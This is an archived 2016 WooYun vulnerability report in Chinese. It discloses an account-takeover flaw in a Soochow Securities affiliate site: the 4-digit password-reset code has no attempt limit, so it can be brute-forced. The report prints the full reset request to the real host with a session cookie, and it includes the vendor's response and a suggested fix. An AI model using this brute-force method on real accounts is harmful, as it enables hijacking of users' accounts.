当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166681

漏洞标题:东吴证券某站任意账号密码重置(设计逻辑缺陷)

相关厂商:东吴证券

漏洞作者: 程序员鼓励师

提交时间:2016-01-02 07:38

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

新年快乐~

详细说明:

http://www.showcai.com.cn/dwzq_front/index/indexInfo


http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile=


QQ图片20160101175610.png


输入手机号获取验证码 填上新密码后进行爆破 - -
经测试确定验证码为4位数字..验证码到期时间足够爆破完了.而且对次数也没有限制

GET /dwzq_front/resetPassword/userResetPassword?mobile=手机号&authCode=验证码&password=新密码&_=1451643718331 HTTP/1.1
Host: www.showcai.com.cn
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.69 Safari/537.36 QQBrowser/9.1.4060.400
Referer: http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile=
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=E7462A4F931D752791CEEA0B8EC44B23; Hm_lvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451636785; Hm_lpvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451643719


QQ图片20160101173149.png


ok拿新密码登录下试试. 成功登录~

QQ图片20160101181728.png

漏洞证明:

GET /dwzq_front/resetPassword/userResetPassword?mobile=手机号&authCode=验证码&password=新密码&_=1451643718331 HTTP/1.1
Host: www.showcai.com.cn
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.69 Safari/537.36 QQBrowser/9.1.4060.400
Referer: http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile=
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=E7462A4F931D752791CEEA0B8EC44B23; Hm_lvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451636785; Hm_lpvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451643719


QQ图片20160101173149.png

修复方案:

加强验证码或者增加次数限制

版权声明:转载请注明来源 程序员鼓励师@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-01-04 10:23

厂商回复:

此为公司的另一站点,非官网,已联系相关人员处理。

最新状态:

暂无

漏洞评价:

评价